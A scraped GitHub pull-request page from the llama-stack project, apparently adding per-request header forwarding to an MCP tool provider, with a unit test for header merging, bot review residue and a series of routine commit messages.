test_forwarded_and_legacy_mcp_headers_are_merged_and_forwarded_headers_take_precedence( self, monkeypatch: Any, ) -> None: """Both legacy mcp_headers and forward_headers are honored; forward_headers take precedence.""" impl = _make_impl(forward_headers={"tid": "X-Tenant-ID", "tok": "Authorization"}) endpoint = "http://mcp-server:8080/sse" # Legacy mcp_headers for this endpoint legacy_mcp_headers = { "Authorization": "legacy-token", "X-Legacy": "legacy-value", } # Request-scoped headers that will be forwarded according to forward_headers request_headers = { "tid": "acme", "tok": "forward-token", } provider_data = SimpleNamespace( headers=request_headers, mcp_headers={endpoint: legacy_mcp_headers}, ) impl.get_request_provider_data = MagicMock(return_value=provider_data) # type: ignore[method-assign] # mock tool_store fake_tool = MagicMock() fake_tool.metadata = {"endpoint": endpoint} impl.tool_store = AsyncMock() impl.tool_store.get_tool.return_value = fake_tool captured: dict[str, Any] = {} async def _capture_invoke_mcp_tool(*args: Any, **kwargs: Any) -> Any: # pragma: no cover - trivial passthrough captured["headers"] = kwargs.get("headers") impl.runtime_handler.invoke_mcp_tool = AsyncMock(side_effect=_capture_invoke_mcp_tool) await impl.invoke_tool( tool_name="some-tool", arguments={}, metadata={}, ) # Expect: # - legacy mcp_headers are present # - forwarded headers are added # - for overlapping keys (e.g. Authorization) forwarded headers win assert captured["headers"] == { "X-Tenant-ID": "acme", # from forward_headers mapping tid -> X-Tenant-ID "Authorization": "forward-token", # forwarded value overrides legacy mcp_headers.Authorization "X-Legacy": "legacy-value", # preserved from legacy mcp_headers }

Ensure SimpleNamespace is imported at the top of tests/integration/tool_runtime/test_passthrough_mcp.py, e.g.:
from types import SimpleNamespace.

If impl.invoke_tool uses different parameter names than tool_name, arguments, and metadata, adjust the call sites in both tests to match the actual signature used elsewhere in this test file.

If get_request_provider_data expects attributes other than headers and mcp_headers, extend the SimpleNamespace in the new test with those attributes as needed.

github-actions · 2026-03-23T22:51:13Z

Recording workflow completed

Providers: ollama

Recordings have been generated and will be committed automatically by the companion workflow.

View workflow run

…lamastack#5134) # What does this PR do? Adds per-request HTTP header forwarding to the `remote::passthrough` inference provider, following the pattern established by the safety passthrough provider (PR llamastack#5004, already merged). A `forward_headers` config field maps provider-data keys to outbound HTTP header names. Only explicitly listed keys are forwarded from `X-LlamaStack-Provider-Data` to the downstream service (default-deny). An `extra_blocked_headers` field lets operators add custom blocked names on top of the core security list. The shared utility `providers/utils/forward_headers.py` is used by both the inference and safety passthrough providers, keeping the forwarding logic and blocked-header policy in one place. Closes llamastack#5040 Relates llamastack#4607 ## Test Plan Unit tests cover the full path — config validation, header extraction, CRLF sanitization, blocked-header enforcement, auth priority chain, and concurrent request isolation: ```bash uv run pytest tests/unit/providers/inference/test_passthrough_forward_headers.py -v ``` Tests cover: - `build_forwarded_headers()` — key mapping, default-deny, CRLF stripping, SecretStr unwrap, case-insensitive dedup - `validate_forward_headers_config()` — blocked header rejection, operator extra blocklist, invalid names - Adapter auth priority — static api_key > passthrough_api_key > forwarded Authorization - Provider data validator — extra fields preserved for forwarding, reserved keys rejected - Concurrent request isolation — contextvars don't leak between parallel requests Also tested end-to-end locally against a mock inference server and a mock `/v1/moderations` server. Headers land on the downstream exactly as configured and blocked headers are rejected at stack startup, not at request time. Example config: ```yaml providers: inference: - provider_id: maas-inference provider_type: remote::passthrough config: base_url: ${env.PASSTHROUGH_URL} forward_headers: maas_api_token: "Authorization" tenant_id: "X-Tenant-ID" ``` Callers pass credentials via `X-LlamaStack-Provider-Data`: ```bash curl http://localhost:8321/v1/chat/completions \ -H 'X-LlamaStack-Provider-Data: {"maas_api_token": "Bearer user-jwt", "tenant_id": "acme"}' \ -d '{"model": "passthrough/my-model", "messages": [{"role": "user", "content": "hello"}]}' ``` The downstream receives `Authorization: Bearer user-jwt` and `X-Tenant-ID: acme`. Only keys explicitly listed in `forward_headers` are forwarded to the downstream service. Any keys in `X-LlamaStack-Provider-Data` that don't have a mapping in `forward_headers` are ignored — they never leave the stack. This is the default-deny policy: if it's not in the config, it doesn't get forwarded.

Addresses GHSA-469j-vmhf-r6v7

) ## Summary - Add Bedrock (`bedrock/openai.gpt-oss-20b`) to the responses test suite in CI - Pre-register the Bedrock model in the ci-tests distribution config - Include ~330 newly recorded Bedrock response test recordings (104 passing, 87% coverage) - Update the provider compatibility matrix to reflect Bedrock coverage ## Test plan - [x] CI replay tests pass for Bedrock responses suite - [x] Provider compatibility matrix renders correctly with Bedrock column - [ ] Provider record job works --------- Co-authored-by: Sébastien Han <seb@redhat.com>

…ng (llamastack#5265) # What does this PR do? Add .pytest_cache/, .mypy_cache/, htmlcov/, *.log, *.swp, *.swo, and *.tsbuildinfo to cover common editor, test, and build artifacts missing from the standard Python/TypeScript gitignore templates. Improves AgentReady .gitignore_completeness score from 61 to 89/100 (Threshold: ≥70) Signed-off-by: Eleanor Hu <ehu@redhat.com> Co-authored-by: Sébastien Han <seb@redhat.com>

…5251) Adds conventional-pre-commit hook to enforce conventional commit format. - Recognized by agentready conventional_commits test Signed-off-by: Derek Higgins <derekh@redhat.com> Co-authored-by: Sébastien Han <seb@redhat.com>

## Summary - The `test_openai_chat_completion_is_async` test intermittently fails on CI runners due to a tight timing assertion (2x multiplier on 0.5s sleep) - Increases the multiplier from 2x to 3x (1.5s threshold), which still validates concurrency (sequential would be 2.0s) while tolerating CI jitter - Fixes flake seen in https://github.com/llamastack/llama-stack/actions/runs/23495075039 ## Test plan - [x] Verified the threshold still validates concurrency: 4 parallel 0.5s sleeps must complete in < 1.5s (sequential would take 2.0s) - [ ] CI unit tests pass without flaking Signed-off-by: Charlie Doern <cdoern@redhat.com> Co-authored-by: Sébastien Han <seb@redhat.com>

# What does this PR do? Trim README for clarity and structure - Add table of contents - Fix heading hierarchy (H3 → H2 throughout) - Merge related sections (Documentation + Client SDKs → Resources; Community + Star History + Contributors) - Fold one-line installer into Overview, remove redundant Benefits sub-section - Tighten prose throughout Improves AgentReady Concise Documentation score from 69 to 85/100 (Threshold: ≥75) Signed-off-by: Eleanor Hu <ehu@redhat.com> Co-authored-by: Sébastien Han <seb@redhat.com>

Fixed llamastack#5256 # What does this PR do?   Add OpenTelemetry metrics to track which optional parameters callers explicitly provide in Responses API (`POST /v1/responses`) requests. This helps understand API usage patterns and prioritize OpenAI parity work. introduced new counter metric `llama_stack.responses.parameter_usage_total` with `operation` and `parameter` attributes For a request like: ```bash curl -X POST http://localhost:8321/v1/responses \ -H 'Content-Type: application/json' \ -d '{ "input": "What is Python?", "model": "ollama/llama3.2:3b-instruct-fp16", "temperature": 0.7, "stream": true, "tools": [], "instructions": "Be concise" }' ``` The following Prometheus metrics are emitted: ``` llama_stack_llama_stack_responses_parameter_usage_total{operation="create_response", parameter="temperature"} 1 llama_stack_llama_stack_responses_parameter_usage_total{operation="create_response", parameter="stream"} 1 llama_stack_llama_stack_responses_parameter_usage_total{operation="create_response", parameter="tools"} 1 llama_stack_llama_stack_responses_parameter_usage_total{operation="create_response", parameter="instructions"} 1 ``` ```console (llama-stack) gualiu@gualiu-mac llama-stack % curl -s 'http://localhost:9090/api/v1/query?query=llama_stack_llama_stack_responses_parameter_usage_total' | jq { "status": "success", "data": { "resultType": "vector", "result": [ { "metric": { "__name__": "llama_stack_llama_stack_responses_parameter_usage_total", "exported_job": "llama-stack-server", "instance": "otel-collector:9464", "job": "otel-collector", "operation": "create_response", "otel_scope_name": "llama_stack.responses", "otel_scope_version": "1.0.0", "parameter": "instructions" }, "value": [ 1774293626.183, "7" ] }, { "metric": { "__name__": "llama_stack_llama_stack_responses_parameter_usage_total", "exported_job": "llama-stack-server", "instance": "otel-collector:9464", "job": "otel-collector", "operation": "create_response", "otel_scope_name": "llama_stack.responses", "otel_scope_version": "1.0.0", "parameter": "stream" }, "value": [ 1774293626.183, "7" ] }, { "metric": { "__name__": "llama_stack_llama_stack_responses_parameter_usage_total", "exported_job": "llama-stack-server", "instance": "otel-collector:9464", "job": "otel-collector", "operation": "create_response", "otel_scope_name": "llama_stack.responses", "otel_scope_version": "1.0.0", "parameter": "temperature" }, "value": [ 1774293626.183, "4" ] }, { "metric": { "__name__": "llama_stack_llama_stack_responses_parameter_usage_total", "exported_job": "llama-stack-server", "instance": "otel-collector:9464", "job": "otel-collector", "operation": "create_response", "otel_scope_name": "llama_stack.responses", "otel_scope_version": "1.0.0", "parameter": "tools" }, "value": [ 1774293626.183, "4" ] } ] } } ``` Co-authored-by: Sébastien Han <seb@redhat.com>

…ck#5271) - Adds a `markdownlint-cli` pre-commit hook with `--fix` to enforce consistent markdown style across the repository - Fixes all existing violations across 75 files, one rule enabled per commit for easier review - Updates Jinja doc templates (`dell`, `nvidia`, `oci`) and codegen scripts (`provider_compat_matrix.py`) to ensure generated docs converge with markdownlint ### Commit-by-commit rule fixes 1. **MD003** — heading style consistency (atx, no closing hashes) 2. **MD024** — no duplicate sibling headings 3. **MD045** — image alt text 4. **MD051** — valid link fragments 5. **MD025** — single top-level heading per document 6. **MD055** — consistent table pipe style 7. **MD059** — descriptive link text (no bare `[here]` links) 8. **MD001** — heading level increment 9. **MD036** — no emphasis as heading (with `markdownlint-disable` for legitimate uses) 10. **MD040** — fenced code blocks must have language specified ### Permanently disabled rules | Rule | Reason | |------|--------| | MD013 | Line length — URLs, badges, and tables often exceed any reasonable limit | | MD033 | Inline HTML — project uses `<details>`, `<summary>`, and other HTML | | MD041 | First line heading — generated reports and some docs don't follow this | | MD060 | Table column style — cosmetic pipe alignment, not auto-fixable, 300+ violations | ## Test plan - [x] `npx markdownlint-cli '**/*.md'` reports zero violations - [x] `uv run pre-commit run --all-files` passes (including codegen convergence hooks) - [x] Distribution template codegen (`distro_codegen.py`) produces identical output on repeated runs --------- Signed-off-by: Eoin Fennessy <efenness@redhat.com> Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com> Co-authored-by: mergify[bot] <37929162+mergify[bot]@users.noreply.github.com>

## Summary Remove the `starter-gpu` distribution which is functionally identical to `starter`. The only difference was the `post_training` provider (`inline::huggingface-gpu` vs `inline::torchtune-cpu`), but the fine-tuning/post-training API is no longer supported. All other providers, configs, and build specs were identical. No external references to `starter-gpu` exist anywhere in the codebase — CI workflows, docs, tests, and scripts all only reference `starter`. ## Test plan - [x] `distro_codegen.py` runs clean without starter-gpu - [x] `provider_codegen.py` runs clean - [x] Unit tests pass - [x] No references to `starter-gpu` remain in CI, docs, or tests 🤖 Generated with [Claude Code](https://claude.com/claude-code) Signed-off-by: Sébastien Han <seb@redhat.com> Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

## Summary **Breaking change** — renames the internal `agents` API to `responses` to better reflect its purpose: it implements the OpenAI Responses API. ### Changes - `Api.agents` → `Api.responses` (enum value) - Provider directory: `providers/inline/agents/` → `providers/inline/responses/` - Provider registry: `registry/agents.py` → `registry/responses.py` - API module: `llama_stack_api/agents/` → `llama_stack_api/responses/` - Classes: `BuiltinAgentsImpl` → `BuiltinResponsesImpl` - Config sections: `agents:` → `responses:` in all distribution YAMLs - File: `agents.py` → `impl.py` (avoids collision with `responses/` subpackage) ### Breaking for - User config files with `agents:` provider section → must change to `responses:` - Code using `Api.agents` → must use `Api.responses` - Imports from `llama_stack_api.agents` → must use `llama_stack_api.responses` ### Migration Could add deprecated aliases to soften the transition — looking for feedback on approach. ## Test plan - [x] 217 unit tests pass - [ ] CI passes 🤖 Generated with [Claude Code](https://claude.com/claude-code) --------- Signed-off-by: Sébastien Han <seb@redhat.com> Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

Replace weak thread-alive check with actual port connectivity test to prevent connection refused errors in docker mode integration tests. -- Testing is this is the cause of flakes Signed-off-by: Derek Higgins <derekh@redhat.com>

…ssing keys (llamastack#5289) All other KVStore backends (SQLite, Redis, MongoDB, Postgres) silently ignore deletes on non-existent keys, this is the standard behavior of `DELETE` in SQL, `delete_one` in MongoDB, and `DEL` in Redis. The in-memory implementation was the only one that raised `KeyError`, breaking the implicit API contract and causing code that works with production backends to fail when switched to the in-memory store for testing. The fix is change `InmemoryKVStoreImpl.delete()` to use `self._store.pop(key, None)` instead of `del self._store[key]`, so deleting a non-existent key is a silent no-op rather than raising `KeyError`. # What does this PR do?    ## Test Plan   Co-authored-by: mergify[bot] <37929162+mergify[bot]@users.noreply.github.com>

# What does this PR do? Splits 5 Python files that exceeded 1000 lines into smaller, focused modules. Pure refactoring with no behavior changes. All public names remain importable from the same paths. | Original file | Lines | Split into | |---|---|---| | `src/llama_stack/models/llama/sku_list.py` | 1029 → 915 | `sku_list_download.py` (128L) | | `scripts/openapi_generator/schema_transforms.py` | 1062 → 871 | `_schema_output.py` (217L) | | `tests/unit/.../vertexai/test_adapter.py` | 1578 | `test_adapter_core.py` (365L), `test_adapter_chat.py` (651L), `test_adapter_params.py` (477L) | | `tests/unit/.../vertexai/test_converters.py` | 1368 | `test_converters_requests.py` (724L), `test_converters_responses.py` (613L), `test_converters_completions.py` (330L) | | `tests/unit/.../vector_io/test_vector_io_openai_vector_stores.py` | 1571 | `test_vector_io_stores_index.py` (422L), `..._files.py` (215L), `..._batches.py` (702L), `..._config.py` (385L) | ## Test Plan ~~~bash # vertexai adapter tests (96 pass) uv run pytest tests/unit/providers/inference/vertexai/test_adapter_core.py \ tests/unit/providers/inference/vertexai/test_adapter_chat.py \ tests/unit/providers/inference/vertexai/test_adapter_params.py -v # vertexai converter tests (118 pass) uv run pytest tests/unit/providers/inference/vertexai/test_converters_requests.py \ tests/unit/providers/inference/vertexai/test_converters_responses.py \ tests/unit/providers/inference/vertexai/test_converters_completions.py -v # vector_io tests (92 pass) uv run pytest tests/unit/providers/vector_io/test_vector_io_stores_index.py \ tests/unit/providers/vector_io/test_vector_io_stores_files.py \ tests/unit/providers/vector_io/test_vector_io_stores_batches.py \ tests/unit/providers/vector_io/test_vector_io_stores_config.py -v # import verification uv run python -c "from llama_stack.models.llama.sku_list import resolve_model, all_registered_models; print(len(all_registered_models()), 'models')" uv run python -c "from scripts.openapi_generator import schema_transforms; assert hasattr(schema_transforms, '_write_yaml_file')" ~~~ No breaking changes. All public imports preserved via re-exports. --------- Signed-off-by: Sumanth Kamenani <skamenan@redhat.com> Signed-off-by: skamenan7 <skamenan@redhat.com> Signed-off-by: Sébastien Han <seb@redhat.com> Co-authored-by: Sébastien Han <seb@redhat.com> Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

…ck#5284) The default host was incorrectly set to a list ["::", "0.0.0.0"] which caused uvicorn to crash with workers > 1. Uvicorn expects the host parameter to be a string, not a list. Changed the default host to "::" which enables dual-stack binding on modern Linux systems, accepting both IPv4 and IPv6 connections. Added error handling for IPv4-only systems with a helpful message directing users to set server.host: "0.0.0.0" in their config. Fixes: llamastack#5283 Signed-off-by: Derek Higgins <derekh@redhat.com> Co-authored-by: Sébastien Han <seb@redhat.com>

## Summary - Add actionlint as a pre-commit hook to lint GitHub Actions workflows (runs via existing pre-commit CI workflow) - Fix all actionlint and shellcheck violations across 16 workflow files, including: - Untrusted input injection risks (pass `github.event.*` through `env:` instead of inline `${{ }}`) - Always-true `if:` condition from redundant `${{ }}` wrapper - Unquoted variables and command substitutions (SC2086, SC2046) - `ls` replaced with `find` for robustness (SC2012) - Grouped consecutive redirects (SC2129) - Removed unused variables (SC2034) - Replaced `sed` with parameter expansion where equivalent (SC2001) - Fixed string vs integer comparison (SC2170) ## Approach Each lint rule is enabled in a separate commit for easier review — first commit disables all failing checks, then each subsequent commit enables one rule and fixes all its violations. ## Test plan - [x] `uv run pre-commit run actionlint --all-files` passes with zero violations - [ ] CI workflows behave identically (all changes are style/safety fixes with no behavioral changes) --------- Signed-off-by: Eoin Fennessy <efenness@redhat.com> Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com> Co-authored-by: Sébastien Han <seb@redhat.com>

sourcery-ai bot reviewed Mar 23, 2026

View reviewed changes

skamenan7 force-pushed the feat/5152-mcp-tool-passthrough branch from bfbfeb5 to a07a34e Compare March 24, 2026 11:33

eoinfennessy and others added 5 commits March 24, 2026 15:08

fix: bump nltk to 3.9.4 (CVE-2026-33236) (llamastack#5259)

c375937

Addresses GHSA-469j-vmhf-r6v7

skamenan7 force-pushed the feat/5152-mcp-tool-passthrough branch 2 times, most recently from 9410037 to c430e0d Compare March 24, 2026 19:14

skamenan7 force-pushed the feat/5152-mcp-tool-passthrough branch from c430e0d to d8f03a9 Compare March 25, 2026 08:45

skamenan7 force-pushed the feat/5152-mcp-tool-passthrough branch from d8f03a9 to f04296b Compare March 25, 2026 09:01

skamenan7 force-pushed the feat/5152-mcp-tool-passthrough branch from f04296b to 1884f72 Compare March 25, 2026 13:45

skamenan7 force-pushed the feat/5152-mcp-tool-passthrough branch from 1884f72 to fff9fb0 Compare March 25, 2026 14:45

skamenan7 force-pushed the feat/5152-mcp-tool-passthrough branch from fff9fb0 to 7a6fc8d Compare March 25, 2026 16:00

skamenan7 force-pushed the feat/5152-mcp-tool-passthrough branch from 7a6fc8d to 179042a Compare March 26, 2026 09:15

skamenan7 force-pushed the feat/5152-mcp-tool-passthrough branch from 179042a to 7f6d945 Compare March 26, 2026 09:30

skamenan7 force-pushed the feat/5152-mcp-tool-passthrough branch from 7f6d945 to 7876559 Compare March 26, 2026 10:30

skamenan7 force-pushed the feat/5152-mcp-tool-passthrough branch from 7876559 to fde93fc Compare March 26, 2026 12:31

eoinfennessy and others added 2 commits March 26, 2026 13:40

add forward_headers passthrough to remote::model-context-protocol

cd9ac53

skamenan7 force-pushed the feat/5152-mcp-tool-passthrough branch from fde93fc to cd9ac53 Compare March 26, 2026 12:46

skamenan7 closed this Mar 26, 2026

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

add forward_headers passthrough to remote::model-context-protocol#2

add forward_headers passthrough to remote::model-context-protocol#2
skamenan7 wants to merge 17 commits intomainfrom
feat/5152-mcp-tool-passthrough

skamenan7 commented Mar 23, 2026 •

edited by sourcery-ai bot

Loading

Uh oh!

sourcery-ai bot commented Mar 23, 2026 •

edited

Loading

Interacting with Sourcery

Customizing Your Experience

Getting Help

Uh oh!

sourcery-ai bot left a comment

Uh oh!

sourcery-ai bot Mar 23, 2026

Uh oh!

sourcery-ai bot Mar 23, 2026

Uh oh!

github-actions bot commented Mar 23, 2026 •

edited

Loading

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

8 participants

		# ---------------------------------------------------------------------------


		class TestListRuntimeToolsWiring:

		# ---------------------------------------------------------------------------


		class TestInvokeToolWiring:

Conversation

skamenan7 commented Mar 23, 2026 • edited by sourcery-ai bot Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

What changed

Test plan

Checklist

Summary by Sourcery

Uh oh!

sourcery-ai bot commented Mar 23, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Reviewer's Guide

Sequence diagram for MCP tool invocation with forwarded headers

Sequence diagram for inference passthrough with forwarded headers and API key precedence

Class diagram for forward_headers configs and utilities

File-Level Changes

Interacting with Sourcery

Customizing Your Experience

Getting Help

Uh oh!

sourcery-ai bot left a comment

Choose a reason for hiding this comment

Uh oh!

sourcery-ai bot Mar 23, 2026

Choose a reason for hiding this comment

Uh oh!

sourcery-ai bot Mar 23, 2026

Choose a reason for hiding this comment

Uh oh!

github-actions bot commented Mar 23, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

8 participants

skamenan7 commented Mar 23, 2026 •

edited by sourcery-ai bot

Loading

sourcery-ai bot commented Mar 23, 2026 •

edited

Loading

github-actions bot commented Mar 23, 2026 •

edited

Loading